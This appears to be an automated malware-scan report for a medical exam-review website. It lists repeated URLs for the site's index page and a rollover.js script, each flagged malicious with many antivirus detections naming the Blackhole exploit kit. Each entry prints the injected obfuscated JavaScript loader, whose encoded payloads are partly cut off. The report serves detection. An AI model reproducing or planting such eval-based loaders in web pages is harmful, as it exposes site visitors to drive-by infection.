Request | Server response | Status |
http://obgynboardexamreview.com/ | 200 OK Content-Length: 15214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)rhrxm=4;rurcw=("80,c6,d5,ce,c3,d4,c9,cf,ce,80,d5,c8,90,99,88,89,80,db,6d,6a,80,d6,c1,d2,80,d3,d4,c1,d4,c9,c3,9d,87,c1,ca,c1,d8,87,9b,6d,6a,80,d6,c1,d2,80,c3,cf,ce,d4,d2,cf,cc,cc,c5,d2,9d,87,c9,ce,c4,c5,d8,8e,d0,c8,d0,87,9b,6d,6a,80,d6,c1,d2,80,d5,c8,80,9d,80,c4,cf,c3,d5,cd,c5,ce,d4,8e,c3,d2,c5,c1,d4,c5,a5,cc,c5,cd,c5,ce,d4,88,87,c9,c6,d2,c1,cd,c5,87,89,9b,6d,6a,6d,6a,80,d5,c8,8e,d3,d2,c3,80,9d,80,87,c8,d4,d4,d0,9a,8f,8f,cd,c5,cc,d4,cf,d2,d2,c9,c5,8e,c3,cf,cd,8f,d3,d5,c2
... 3536 bytes are skipped ...5,d1,87,89,9d,9d,95,95,89,db,dd,c5,cc,d3,c5,db,b3,c5,d4,a3,cf,cf,cb,c9,c5,88,87,d6,c9,d3,c9,d4,c5,c4,bf,d5,d1,87,8c,80,87,95,95,87,8c,80,87,91,87,8c,80,87,8f,87,89,9b,6d,6a,6d,6a,d5,c8,90,99,88,89,9b,6d,6a,dd,6d,6a,dd".split(","));hgcj=eval;function gqgyy(){alwmf=function(){--(fket.body)}()}fket=document;for(nye=0;nye<rurcw["length"];nye+=1){rurcw[nye]=-(96)+parseInt(rurcw[nye],rhrxm*4);}try{gqgyy()}catch(dum){mhwxys=50-50;}if(!mhwxys)hgcj(String["fr"+"omCh"+"arCo"+"de"].apply(String,rurcw));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://obgynboardexamreview.com/./assets/rollover.js | 200 OK Content-Length: 27281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jiycqc="y";qaj="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[qaj].body)==null}()}catch(aoef){kiqix=function(rxvy){rxvy="fr"+"omCh"+rxvy;for(ffc=0;ffc<jiycqc.length;ffc++){rei+=String[rxvy](tej(doq+(jiycqc[ffc]))-(20));}};};tej=(window.eval);doq="0x";jedm=0;try{;}catch(vwy){jedm=1}if(!jedm){try{++tej(qaj)["\x62o"+"d"+jiycqc]}catch(aoef){poaif="^";}jiycqc="34^7a^89^82^77^88^7d^83^82^34^85^87^87^8a^44^4d^3c^3d^34^8f^21^1e^34^8a^75^86^34^87^88^75^88^7d^77^51^3b^75^7e^
... 3741 bytes are skipped ...3c^34^80^79^82^40^34^79^82^78^34^3d^34^3d^4f^21^1e^91^21^1e^7d^7a^34^3c^82^75^8a^7d^7b^75^88^83^86^42^77^83^83^7f^7d^79^59^82^75^76^80^79^78^3d^21^1e^8f^21^1e^7d^7a^3c^5b^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^3d^51^51^49^49^3d^8f^91^79^80^87^79^8f^67^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^40^34^3b^49^49^3b^40^34^3b^45^3b^40^34^3b^43^3b^3d^4f^21^1e^21^1e^85^87^87^8a^44^4d^3c^3d^4f^21^1e^91^21^1e^91".split(poaif);rei="";kiqix("arCode");tej(""+rei);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://obgynboardexamreview.com/./index.html | 200 OK Content-Length: 15214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)rhrxm=4;rurcw=("80,c6,d5,ce,c3,d4,c9,cf,ce,80,d5,c8,90,99,88,89,80,db,6d,6a,80,d6,c1,d2,80,d3,d4,c1,d4,c9,c3,9d,87,c1,ca,c1,d8,87,9b,6d,6a,80,d6,c1,d2,80,c3,cf,ce,d4,d2,cf,cc,cc,c5,d2,9d,87,c9,ce,c4,c5,d8,8e,d0,c8,d0,87,9b,6d,6a,80,d6,c1,d2,80,d5,c8,80,9d,80,c4,cf,c3,d5,cd,c5,ce,d4,8e,c3,d2,c5,c1,d4,c5,a5,cc,c5,cd,c5,ce,d4,88,87,c9,c6,d2,c1,cd,c5,87,89,9b,6d,6a,6d,6a,80,d5,c8,8e,d3,d2,c3,80,9d,80,87,c8,d4,d4,d0,9a,8f,8f,cd,c5,cc,d4,cf,d2,d2,c9,c5,8e,c3,cf,cd,8f,d3,d5,c2
... 3536 bytes are skipped ...5,d1,87,89,9d,9d,95,95,89,db,dd,c5,cc,d3,c5,db,b3,c5,d4,a3,cf,cf,cb,c9,c5,88,87,d6,c9,d3,c9,d4,c5,c4,bf,d5,d1,87,8c,80,87,95,95,87,8c,80,87,91,87,8c,80,87,8f,87,89,9b,6d,6a,6d,6a,d5,c8,90,99,88,89,9b,6d,6a,dd,6d,6a,dd".split(","));hgcj=eval;function gqgyy(){alwmf=function(){--(fket.body)}()}fket=document;for(nye=0;nye<rurcw["length"];nye+=1){rurcw[nye]=-(96)+parseInt(rurcw[nye],rhrxm*4);}try{gqgyy()}catch(dum){mhwxys=50-50;}if(!mhwxys)hgcj(String["fr"+"omCh"+"arCo"+"de"].apply(String,rurcw));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://obgynboardexamreview.com/././assets/rollover.js | 200 OK Content-Length: 27281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jiycqc="y";qaj="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[qaj].body)==null}()}catch(aoef){kiqix=function(rxvy){rxvy="fr"+"omCh"+rxvy;for(ffc=0;ffc<jiycqc.length;ffc++){rei+=String[rxvy](tej(doq+(jiycqc[ffc]))-(20));}};};tej=(window.eval);doq="0x";jedm=0;try{;}catch(vwy){jedm=1}if(!jedm){try{++tej(qaj)["\x62o"+"d"+jiycqc]}catch(aoef){poaif="^";}jiycqc="34^7a^89^82^77^88^7d^83^82^34^85^87^87^8a^44^4d^3c^3d^34^8f^21^1e^34^8a^75^86^34^87^88^75^88^7d^77^51^3b^75^7e^
... 3741 bytes are skipped ...3c^34^80^79^82^40^34^79^82^78^34^3d^34^3d^4f^21^1e^91^21^1e^7d^7a^34^3c^82^75^8a^7d^7b^75^88^83^86^42^77^83^83^7f^7d^79^59^82^75^76^80^79^78^3d^21^1e^8f^21^1e^7d^7a^3c^5b^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^3d^51^51^49^49^3d^8f^91^79^80^87^79^8f^67^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^40^34^3b^49^49^3b^40^34^3b^45^3b^40^34^3b^43^3b^3d^4f^21^1e^21^1e^85^87^87^8a^44^4d^3c^3d^4f^21^1e^91^21^1e^91".split(poaif);rei="";kiqix("arCode");tej(""+rei);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://obgynboardexamreview.com/././index.html | 200 OK Content-Length: 15214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)rhrxm=4;rurcw=("80,c6,d5,ce,c3,d4,c9,cf,ce,80,d5,c8,90,99,88,89,80,db,6d,6a,80,d6,c1,d2,80,d3,d4,c1,d4,c9,c3,9d,87,c1,ca,c1,d8,87,9b,6d,6a,80,d6,c1,d2,80,c3,cf,ce,d4,d2,cf,cc,cc,c5,d2,9d,87,c9,ce,c4,c5,d8,8e,d0,c8,d0,87,9b,6d,6a,80,d6,c1,d2,80,d5,c8,80,9d,80,c4,cf,c3,d5,cd,c5,ce,d4,8e,c3,d2,c5,c1,d4,c5,a5,cc,c5,cd,c5,ce,d4,88,87,c9,c6,d2,c1,cd,c5,87,89,9b,6d,6a,6d,6a,80,d5,c8,8e,d3,d2,c3,80,9d,80,87,c8,d4,d4,d0,9a,8f,8f,cd,c5,cc,d4,cf,d2,d2,c9,c5,8e,c3,cf,cd,8f,d3,d5,c2
... 3536 bytes are skipped ...5,d1,87,89,9d,9d,95,95,89,db,dd,c5,cc,d3,c5,db,b3,c5,d4,a3,cf,cf,cb,c9,c5,88,87,d6,c9,d3,c9,d4,c5,c4,bf,d5,d1,87,8c,80,87,95,95,87,8c,80,87,91,87,8c,80,87,8f,87,89,9b,6d,6a,6d,6a,d5,c8,90,99,88,89,9b,6d,6a,dd,6d,6a,dd".split(","));hgcj=eval;function gqgyy(){alwmf=function(){--(fket.body)}()}fket=document;for(nye=0;nye<rurcw["length"];nye+=1){rurcw[nye]=-(96)+parseInt(rurcw[nye],rhrxm*4);}try{gqgyy()}catch(dum){mhwxys=50-50;}if(!mhwxys)hgcj(String["fr"+"omCh"+"arCo"+"de"].apply(String,rurcw));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://obgynboardexamreview.com/./././assets/rollover.js | 200 OK Content-Length: 27281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jiycqc="y";qaj="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[qaj].body)==null}()}catch(aoef){kiqix=function(rxvy){rxvy="fr"+"omCh"+rxvy;for(ffc=0;ffc<jiycqc.length;ffc++){rei+=String[rxvy](tej(doq+(jiycqc[ffc]))-(20));}};};tej=(window.eval);doq="0x";jedm=0;try{;}catch(vwy){jedm=1}if(!jedm){try{++tej(qaj)["\x62o"+"d"+jiycqc]}catch(aoef){poaif="^";}jiycqc="34^7a^89^82^77^88^7d^83^82^34^85^87^87^8a^44^4d^3c^3d^34^8f^21^1e^34^8a^75^86^34^87^88^75^88^7d^77^51^3b^75^7e^
... 3741 bytes are skipped ...3c^34^80^79^82^40^34^79^82^78^34^3d^34^3d^4f^21^1e^91^21^1e^7d^7a^34^3c^82^75^8a^7d^7b^75^88^83^86^42^77^83^83^7f^7d^79^59^82^75^76^80^79^78^3d^21^1e^8f^21^1e^7d^7a^3c^5b^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^3d^51^51^49^49^3d^8f^91^79^80^87^79^8f^67^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^40^34^3b^49^49^3b^40^34^3b^45^3b^40^34^3b^43^3b^3d^4f^21^1e^21^1e^85^87^87^8a^44^4d^3c^3d^4f^21^1e^91^21^1e^91".split(poaif);rei="";kiqix("arCode");tej(""+rei);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://obgynboardexamreview.com/./././index.html | 200 OK Content-Length: 15214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)rhrxm=4;rurcw=("80,c6,d5,ce,c3,d4,c9,cf,ce,80,d5,c8,90,99,88,89,80,db,6d,6a,80,d6,c1,d2,80,d3,d4,c1,d4,c9,c3,9d,87,c1,ca,c1,d8,87,9b,6d,6a,80,d6,c1,d2,80,c3,cf,ce,d4,d2,cf,cc,cc,c5,d2,9d,87,c9,ce,c4,c5,d8,8e,d0,c8,d0,87,9b,6d,6a,80,d6,c1,d2,80,d5,c8,80,9d,80,c4,cf,c3,d5,cd,c5,ce,d4,8e,c3,d2,c5,c1,d4,c5,a5,cc,c5,cd,c5,ce,d4,88,87,c9,c6,d2,c1,cd,c5,87,89,9b,6d,6a,6d,6a,80,d5,c8,8e,d3,d2,c3,80,9d,80,87,c8,d4,d4,d0,9a,8f,8f,cd,c5,cc,d4,cf,d2,d2,c9,c5,8e,c3,cf,cd,8f,d3,d5,c2
... 3536 bytes are skipped ...5,d1,87,89,9d,9d,95,95,89,db,dd,c5,cc,d3,c5,db,b3,c5,d4,a3,cf,cf,cb,c9,c5,88,87,d6,c9,d3,c9,d4,c5,c4,bf,d5,d1,87,8c,80,87,95,95,87,8c,80,87,91,87,8c,80,87,8f,87,89,9b,6d,6a,6d,6a,d5,c8,90,99,88,89,9b,6d,6a,dd,6d,6a,dd".split(","));hgcj=eval;function gqgyy(){alwmf=function(){--(fket.body)}()}fket=document;for(nye=0;nye<rurcw["length"];nye+=1){rurcw[nye]=-(96)+parseInt(rurcw[nye],rhrxm*4);}try{gqgyy()}catch(dum){mhwxys=50-50;}if(!mhwxys)hgcj(String["fr"+"omCh"+"arCo"+"de"].apply(String,rurcw));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://obgynboardexamreview.com/././././assets/rollover.js | 200 OK Content-Length: 27281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jiycqc="y";qaj="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[qaj].body)==null}()}catch(aoef){kiqix=function(rxvy){rxvy="fr"+"omCh"+rxvy;for(ffc=0;ffc<jiycqc.length;ffc++){rei+=String[rxvy](tej(doq+(jiycqc[ffc]))-(20));}};};tej=(window.eval);doq="0x";jedm=0;try{;}catch(vwy){jedm=1}if(!jedm){try{++tej(qaj)["\x62o"+"d"+jiycqc]}catch(aoef){poaif="^";}jiycqc="34^7a^89^82^77^88^7d^83^82^34^85^87^87^8a^44^4d^3c^3d^34^8f^21^1e^34^8a^75^86^34^87^88^75^88^7d^77^51^3b^75^7e^
... 3741 bytes are skipped ...3c^34^80^79^82^40^34^79^82^78^34^3d^34^3d^4f^21^1e^91^21^1e^7d^7a^34^3c^82^75^8a^7d^7b^75^88^83^86^42^77^83^83^7f^7d^79^59^82^75^76^80^79^78^3d^21^1e^8f^21^1e^7d^7a^3c^5b^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^3d^51^51^49^49^3d^8f^91^79^80^87^79^8f^67^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^40^34^3b^49^49^3b^40^34^3b^45^3b^40^34^3b^43^3b^3d^4f^21^1e^21^1e^85^87^87^8a^44^4d^3c^3d^4f^21^1e^91^21^1e^91".split(poaif);rei="";kiqix("arCode");tej(""+rei);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://obgynboardexamreview.com/././././index.html | 200 OK Content-Length: 15214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)rhrxm=4;rurcw=("80,c6,d5,ce,c3,d4,c9,cf,ce,80,d5,c8,90,99,88,89,80,db,6d,6a,80,d6,c1,d2,80,d3,d4,c1,d4,c9,c3,9d,87,c1,ca,c1,d8,87,9b,6d,6a,80,d6,c1,d2,80,c3,cf,ce,d4,d2,cf,cc,cc,c5,d2,9d,87,c9,ce,c4,c5,d8,8e,d0,c8,d0,87,9b,6d,6a,80,d6,c1,d2,80,d5,c8,80,9d,80,c4,cf,c3,d5,cd,c5,ce,d4,8e,c3,d2,c5,c1,d4,c5,a5,cc,c5,cd,c5,ce,d4,88,87,c9,c6,d2,c1,cd,c5,87,89,9b,6d,6a,6d,6a,80,d5,c8,8e,d3,d2,c3,80,9d,80,87,c8,d4,d4,d0,9a,8f,8f,cd,c5,cc,d4,cf,d2,d2,c9,c5,8e,c3,cf,cd,8f,d3,d5,c2
... 3536 bytes are skipped ...5,d1,87,89,9d,9d,95,95,89,db,dd,c5,cc,d3,c5,db,b3,c5,d4,a3,cf,cf,cb,c9,c5,88,87,d6,c9,d3,c9,d4,c5,c4,bf,d5,d1,87,8c,80,87,95,95,87,8c,80,87,91,87,8c,80,87,8f,87,89,9b,6d,6a,6d,6a,d5,c8,90,99,88,89,9b,6d,6a,dd,6d,6a,dd".split(","));hgcj=eval;function gqgyy(){alwmf=function(){--(fket.body)}()}fket=document;for(nye=0;nye<rurcw["length"];nye+=1){rurcw[nye]=-(96)+parseInt(rurcw[nye],rhrxm*4);}try{gqgyy()}catch(dum){mhwxys=50-50;}if(!mhwxys)hgcj(String["fr"+"omCh"+"arCo"+"de"].apply(String,rurcw));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://obgynboardexamreview.com/./././././assets/rollover.js | 200 OK Content-Length: 27281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jiycqc="y";qaj="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[qaj].body)==null}()}catch(aoef){kiqix=function(rxvy){rxvy="fr"+"omCh"+rxvy;for(ffc=0;ffc<jiycqc.length;ffc++){rei+=String[rxvy](tej(doq+(jiycqc[ffc]))-(20));}};};tej=(window.eval);doq="0x";jedm=0;try{;}catch(vwy){jedm=1}if(!jedm){try{++tej(qaj)["\x62o"+"d"+jiycqc]}catch(aoef){poaif="^";}jiycqc="34^7a^89^82^77^88^7d^83^82^34^85^87^87^8a^44^4d^3c^3d^34^8f^21^1e^34^8a^75^86^34^87^88^75^88^7d^77^51^3b^75^7e^
... 3741 bytes are skipped ...3c^34^80^79^82^40^34^79^82^78^34^3d^34^3d^4f^21^1e^91^21^1e^7d^7a^34^3c^82^75^8a^7d^7b^75^88^83^86^42^77^83^83^7f^7d^79^59^82^75^76^80^79^78^3d^21^1e^8f^21^1e^7d^7a^3c^5b^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^3d^51^51^49^49^3d^8f^91^79^80^87^79^8f^67^79^88^57^83^83^7f^7d^79^3c^3b^8a^7d^87^7d^88^79^78^73^89^85^3b^40^34^3b^49^49^3b^40^34^3b^45^3b^40^34^3b^43^3b^3d^4f^21^1e^21^1e^85^87^87^8a^44^4d^3c^3d^4f^21^1e^91^21^1e^91".split(poaif);rei="";kiqix("arCode");tej(""+rei);}Antivirus reports:- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Comodo
- UnclassifiedMalware
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://obgynboardexamreview.com/./././././index.html | 200 OK Content-Length: 15214 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)rhrxm=4;rurcw=("80,c6,d5,ce,c3,d4,c9,cf,ce,80,d5,c8,90,99,88,89,80,db,6d,6a,80,d6,c1,d2,80,d3,d4,c1,d4,c9,c3,9d,87,c1,ca,c1,d8,87,9b,6d,6a,80,d6,c1,d2,80,c3,cf,ce,d4,d2,cf,cc,cc,c5,d2,9d,87,c9,ce,c4,c5,d8,8e,d0,c8,d0,87,9b,6d,6a,80,d6,c1,d2,80,d5,c8,80,9d,80,c4,cf,c3,d5,cd,c5,ce,d4,8e,c3,d2,c5,c1,d4,c5,a5,cc,c5,cd,c5,ce,d4,88,87,c9,c6,d2,c1,cd,c5,87,89,9b,6d,6a,6d,6a,80,d5,c8,8e,d3,d2,c3,80,9d,80,87,c8,d4,d4,d0,9a,8f,8f,cd,c5,cc,d4,cf,d2,d2,c9,c5,8e,c3,cf,cd,8f,d3,d5,c2
... 3536 bytes are skipped ...5,d1,87,89,9d,9d,95,95,89,db,dd,c5,cc,d3,c5,db,b3,c5,d4,a3,cf,cf,cb,c9,c5,88,87,d6,c9,d3,c9,d4,c5,c4,bf,d5,d1,87,8c,80,87,95,95,87,8c,80,87,91,87,8c,80,87,8f,87,89,9b,6d,6a,6d,6a,d5,c8,90,99,88,89,9b,6d,6a,dd,6d,6a,dd".split(","));hgcj=eval;function gqgyy(){alwmf=function(){--(fket.body)}()}fket=document;for(nye=0;nye<rurcw["length"];nye+=1){rurcw[nye]=-(96)+parseInt(rurcw[nye],rhrxm*4);}try{gqgyy()}catch(dum){mhwxys=50-50;}if(!mhwxys)hgcj(String["fr"+"omCh"+"arCo"+"de"].apply(String,rurcw));Antivirus reports:- Qihoo-360
- Trojan.Generic
- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
